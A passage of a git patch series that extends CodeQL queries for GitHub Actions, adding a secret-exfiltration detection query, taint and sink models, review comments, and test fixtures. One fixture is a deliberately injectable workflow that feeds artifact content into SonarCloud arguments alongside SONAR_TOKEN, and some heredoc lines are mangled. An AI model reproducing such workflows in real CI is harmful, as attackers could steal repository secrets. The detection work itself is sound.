jitterbit/get-changed-files | * | output.removed | PR changed files | manual | +| jitterbit/get-changed-files | * | output.renamed | PR changed files | manual | +| khan/pull-request-comment-trigger | * | output.comment_body | Comment body | manual | +| marocchino/on_artifact | * | output.* | Downloaded artifact | manual | +| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | manual | +| tj-actions/branch-names | * | output.current_branch | PR current branch | manual | +| tj-actions/branch-names | * | output.head_ref_branch | PR head branch | manual | +| tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | manual | +| tj-actions/changed-files | * | 
output.added_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_changed_and_modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_changed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_old_new_renamed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.changed_keys | PR changed files | manual | +| tj-actions/changed-files | * | output.copied_files | PR changed files | manual | +| tj-actions/changed-files | * | output.deleted_files | PR changed files | manual | +| tj-actions/changed-files | * | output.modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.modified_keys | PR changed files | manual | +| tj-actions/changed-files | * | output.other_changed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.other_deleted_files | PR changed files | manual | +| tj-actions/changed-files | * | output.other_modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.renamed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.type_changed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.unknown_files | PR changed files | manual | +| tj-actions/changed-files | * | output.unmerged_files | PR changed files | manual | +| tj-actions/verify-changed-files | * | output.changed-files | PR changed files | manual | +| trilom/file-changes-action | * | output.files | PR changed files | manual | +| trilom/file-changes-action | * | output.files_added | PR changed files | manual | +| trilom/file-changes-action | * | output.files_modified | PR changed files | manual | +| trilom/file-changes-action | * | output.files_removed | PR changed files | manual | +| tzkhan/pr-update-action | * | output.headMatch | | manual | +| xt0rted/slash-command-action | 
* | output.command-arguments | | manual | +summaries +| akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | +| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | +| apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | manual | +| ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | +| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | +| ashley-taylor/regex-property-action | * | input.value | output.value | taint | manual | +| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | manual | +| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | manual | +| aszc/change-string-case-action | * | input.string | output.capitalized | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | +| bobheadxi/deployments | * | input.env | output.env | taint | manual | +| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | +| 
coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | manual | +| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | +| csexton/release-asset-action | * | input.release-url | output.url | taint | manual | +| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | manual | +| frabert/replace-string-action | * | input.replace-with | output.replaced | taint | manual | +| frabert/replace-string-action | * | input.string | output.replaced | taint | manual | +| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | +| getsentry/action-release | * | input.version | output.version | taint | manual | +| getsentry/action-release | * | input.version_prefix | output.version | taint | manual | +| github/codeql-action | * | input.output | output.sarif-output | taint | manual | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | +| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | +| haya14busa/action-cond | * | input.if_false | output.value | taint | manual | +| haya14busa/action-cond | * | input.if_true | output.value | taint | manual | +| hexlet/project-action | * | input.mount-path | env.PWD | taint | manual | +| jsdaniell/create-json | * | input.dir | output.successfully | taint | manual | +| jsdaniell/create-json | * | input.json | output.successfully | taint | manual | +| jsdaniell/create-json | * | input.name | output.successfully | taint | manual | +| jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | +| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | +| mad9000/actions-find-and-replace-string | * | input.replace | 
output.value | taint | manual | +| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | +| mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | manual | +| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | manual | +| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | +| mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | +| mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | +| ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | +| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | +| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | +| shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | +| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | +| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | +| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | +calls +| .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | +needs +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +testNormalizeExpr +| foo['bar'] == baz | foo.bar == baz | +| github.event.pull_request.user["login"] | github.event.pull_request.user.login | +| github.event.pull_request.user['login'] | github.event.pull_request.user.login | +| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | +writeToGitHubEnv +| id1 | $(> $GITHUB_ENV echo "$TITLE" >> $GITHUB_ENV echo "EOF" >> 
$GITHUB_ENV - - run: | + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" - ls | grep -E "*.(tar.gz|zip)$" >> "${GITHUB_ENV}" - ls | grep -E "*.(txt|md)$" >> "${GITHUB_ENV}" + echo "$TITLE" >> "${GITHUB_ENV}" echo "EOF" >> "${GITHUB_ENV}" - - run: | + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | { echo 'JSON_RESPONSE<> "$GITHUB_ENV" echo EOF } >> "$GITHUB_ENV" + - run: | + cat <<-"EOF" >> "$GITHUB_ENV" + echo "$TITLE" + EOF diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index 32379a7264f..31a550e3756 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected @@ -5,6 +5,8 @@ edges | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | | .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | | .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | +| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | .github/workflows/test4.yml:31:9:37:6 | Run Step | +| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | .github/workflows/test4.yml:37:9:45:6 | Run Step | nodes | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | 
@@ -18,5 +20,9 @@ nodes | .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:25:9:31:6 | Run Step | semmle.label | Run Step | | .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:31:9:37:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:37:9:45:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected index 77db4c10344..527808d10b0 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected @@ -5,6 +5,8 @@ edges | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | | .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | | .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | +| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | .github/workflows/test4.yml:31:9:37:6 | Run Step | +| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | .github/workflows/test4.yml:37:9:45:6 | Run Step | nodes | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | 
@@ -18,6 +20,10 @@ nodes | .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:25:9:31:6 | Run Step | semmle.label | Run Step | | .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:31:9:37:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:37:9:45:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Run Step | 
@@ -27,3 +33,5 @@ subpaths | .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | | .github/workflows/test4.yml:21:9:25:6 | Run Step | .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:21:9:25:6 | Run Step | Run Step | | .github/workflows/test4.yml:25:9:31:6 | Run Step | .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:25:9:31:6 | Run Step | Run Step | +| .github/workflows/test4.yml:31:9:37:6 | Run Step | .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | .github/workflows/test4.yml:31:9:37:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:31:9:37:6 | Run Step | Run Step | +| .github/workflows/test4.yml:37:9:45:6 | Run Step | .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | .github/workflows/test4.yml:37:9:45:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:37:9:45:6 | Run Step | Run Step | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index bf515674d90..c9f814139a0 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -2,7 +2,8 @@ edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | 
@@ -74,6 +75,7 @@ nodes | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | semmle.label | Run Step: pr | | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | semmle.label | Run Step: pr [id] | | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | semmle.label | steps.pr.outputs.id | | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | semmle.label | Uses Step: pr | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 6ba7a1c714a..35b27172db6 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -2,7 +2,8 @@ edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | 
@@ -74,6 +75,7 @@ nodes | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | semmle.label | Run Step: pr | | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | semmle.label | Run Step: pr [id] | | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | semmle.label | steps.pr.outputs.id | | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | semmle.label | Uses Step: pr | From e45010ec5bdcbff5f5136b85cb75ae1a7d1e8e0d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Apr 2024 13:07:54 +0200 Subject: [PATCH 0172/1267] Add Secret exfiltration query --- .../security/SecretExfiltrationQuery.qll | 22 ++++++++ ...rSource_sonarcloud-github-action.model.yml | 7 +++ ql/src/Security/CWE-200/SecretExfiltration.ql | 22 ++++++++ .../CWE-200/.github/workflows/test1.yml | 50 +++++++++++++++++++ .../CWE-200/SecretExfiltration.expected | 22 ++++++++ .../Security/CWE-200/SecretExfiltration.qlref | 2 + 6 files changed, 125 insertions(+) create mode 100644 ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll create mode 100644 ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml create mode 100644 ql/src/Security/CWE-200/SecretExfiltration.ql create mode 100644 ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected create mode 100644 ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref 
diff --git a/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll b/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll
new file mode 100644
index 00000000000..1886af435cf
--- /dev/null
+++ b/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll
@@ -0,0 +1,22 @@
+private import actions
+private import codeql.actions.TaintTracking
+private import codeql.actions.dataflow.ExternalFlow
+import codeql.actions.dataflow.FlowSources
+private import codeql.actions.security.ArtifactPoisoningQuery
+import codeql.actions.DataFlow
+
+private class SecretExfiltrationSink extends DataFlow::Node {
+ SecretExfiltrationSink() { externallyDefinedSink(this, "secret-exfiltration") }
+}
+
+/**
+ * A taint-tracking configuration for untrusted data that reaches a sink where it may lead to secret exfiltration
+ */
+private module SecretExfiltrationConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof SecretExfiltrationSink }
+}
+
+/** Tracks flow of unsafe user input that is used in a context where it may lead to a secret exfiltration. */
+module SecretExfiltrationFlow = TaintTracking::Global;
diff --git a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml
new file mode 100644
index 00000000000..0220f0d54d8
--- /dev/null
+++ b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["SonarSource/sonarcloud-github-action", "*", "input.args", "secret-exfiltration", "manual"]
+
diff --git a/ql/src/Security/CWE-200/SecretExfiltration.ql b/ql/src/Security/CWE-200/SecretExfiltration.ql
new file mode 100644
index 00000000000..a6d1c18b733
--- /dev/null
+++ b/ql/src/Security/CWE-200/SecretExfiltration.ql
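Review bot: In `SecretExfiltrationQuery.qll`, `SecretExfiltrationConfig` accepts any `RemoteFlowSource` that reaches a node modelled as `secret-exfiltration`, but nothing in `isSink` checks that the receiving step actually has a secret in scope. A step using the modelled action without any `secrets.*` value in its `env` or `with` would presumably still be reported, which sits uneasily with the `@precision high` declared in the query. Either restrict the sink to steps that reference a secret, or record the assumption in the QLDoc, for example `/** A sink is any argument modelled as "secret-exfiltration"; whether the step holds a secret is not checked. */`. `private import codeql.actions.security.ArtifactPoisoningQuery` is not referenced by name in the new file; if it is there only to bring artifact sources into scope, a one-line comment saying so would keep it from being removed as unused.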
@@ -0,0 +1,22 @@
+/**
+ * @name Secret exfiltration
+ * @description Secrets may be exfiltrated by an attacker who can control the data sent to an external service.
+ * @kind path-problem
+ * @problem.severity error
+ * @security-severity 9.0
+ * @precision high
+ * @id actions/secret-exfiltration
+ * @tags actions
+ * security
+ * external/cwe/cwe-200
+ */
+
+import actions
+import codeql.actions.security.SecretExfiltrationQuery
+import SecretExfiltrationFlow::PathGraph
+
+from SecretExfiltrationFlow::PathNode source, SecretExfiltrationFlow::PathNode sink
+where SecretExfiltrationFlow::flowPath(source, sink)
+select sink.getNode(), source, sink,
+ "Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource.",
+ sink, sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml
new file mode 100644
index 00000000000..21e7aac4768
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml
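Review bot: The alert message in `SecretExfiltration.ql` contains a doubled word, `which may be be leaked`, and its subject is misleading: `$@` is bound to the sink expression, so the sentence says the expression is leaked rather than the step's secrets. Suggested text: `"Potential secret exfiltration in $@, which may leak secrets to an attacker-controlled resource."`. The same string is recorded in `SecretExfiltration.expected`, so that file needs regenerating along with the change. The inline cast `.(Expression)` in the `select` will presumably drop any result whose sink is not an `Expression`; a short comment stating that all `secret-exfiltration` sinks are expected to be expressions would make that intentional.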
@@ -0,0 +1,50 @@
+name: Sonar Code Coverage Upload
+on:
+ workflow_run:
+ workflows: ["Build/Test"]
+ types: [completed]
+jobs:
+ sonar:
+ name: Sonar
+ runs-on: ubuntu-latest
+ if: github.event.workflow_run.conclusion == 'success'
+ steps:
+ - name: 'Download code coverage'
+ uses: actions/github-script@v7
+ with:
+ script: |
+ let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ run_id: context.payload.workflow_run.id,
+ });
+ let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => {
+ return artifact.name == "oc-code-coverage"
+ })[0];
+ let download = await github.rest.actions.downloadArtifact({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ artifact_id: matchArtifact.id,
+ archive_format: 'zip',
+ });
+ let fs = require('fs');
+ fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data));
+ - name: 'Unzip code coverage'
+ run: unzip oc-code-coverage.zip -d coverage
+ - name: set env vars
+ run: |
+ echo "SONAR_PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV
+ echo "SONAR_BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV
+ echo "SONAR_HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV
+ - name: SonarCloud Scan (PR)
+ uses: sonarsource/sonarcloud-github-action@master
+ if: env.SONAR_HEAD != 'develop'
+ env:
+ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+ SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }}
+ with:
+ args: >
+ -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }}
+ -Dsonar.pullrequest.key=${{ env.SONAR_PR_NUM }}
+ -Dsonar.pullrequest.branch=${{ env.SONAR_HEAD }}
+ -Dsonar.pullrequest.base=${{ env.SONAR_BASE }}
diff --git a/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected b/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected
new file mode 100644
index 00000000000..3fbc081a0f4
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected
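Review bot: `test1.yml` is the only fixture added for the new query and it covers only the case that must be flagged: artifact contents copied into `$GITHUB_ENV` and then interpolated into `args` of the SonarCloud step while `SONAR_TOKEN` is in `env`. With no workflow that should stay silent, `SecretExfiltration.expected` cannot catch a later change that makes the query over-report. A second fixture that uses the same action with `args` built only from literal values would pin the negative side. A header comment such as `# BAD: untrusted artifact content reaches the sonarcloud args while SONAR_TOKEN is in env` would also state what the fixture is meant to demonstrate.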
@@ -0,0 +1,22 @@ +edges +| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_BASE] | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | +| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_HEAD] | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | +| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_PR_NUM] | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | +| .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:34:9:39:6 | Run Step | +| .github/workflows/test1.yml:34:9:39:6 | Run Step | .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_BASE] | +| .github/workflows/test1.yml:34:9:39:6 | Run Step | .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_HEAD] | +| .github/workflows/test1.yml:34:9:39:6 | Run Step | .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_PR_NUM] | +nodes +| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_BASE] | semmle.label | Job: sonar [SONAR_BASE] | +| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_HEAD] | semmle.label | Job: sonar [SONAR_HEAD] | +| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_PR_NUM] | semmle.label | Job: sonar [SONAR_PR_NUM] | +| .github/workflows/test1.yml:12:9:32:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test1.yml:34:9:39:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | semmle.label | env.SONAR_BASE | +| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | semmle.label | env.SONAR_HEAD | +| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | semmle.label | env.SONAR_PR_NUM | +subpaths +#select +| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. 
| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | ${{ env.SONAR_BASE }} | +| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | ${{ env.SONAR_HEAD }} | +| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | ${{ env.SONAR_PR_NUM }} | diff --git a/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref b/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref new file mode 100644 index 00000000000..cd179c0f1e6 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref @@ -0,0 +1,2 @@ +Security/CWE-200/SecretExfiltration.ql + From 25eace71bf1d327464b57db88cfaabc5f27d82d8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: 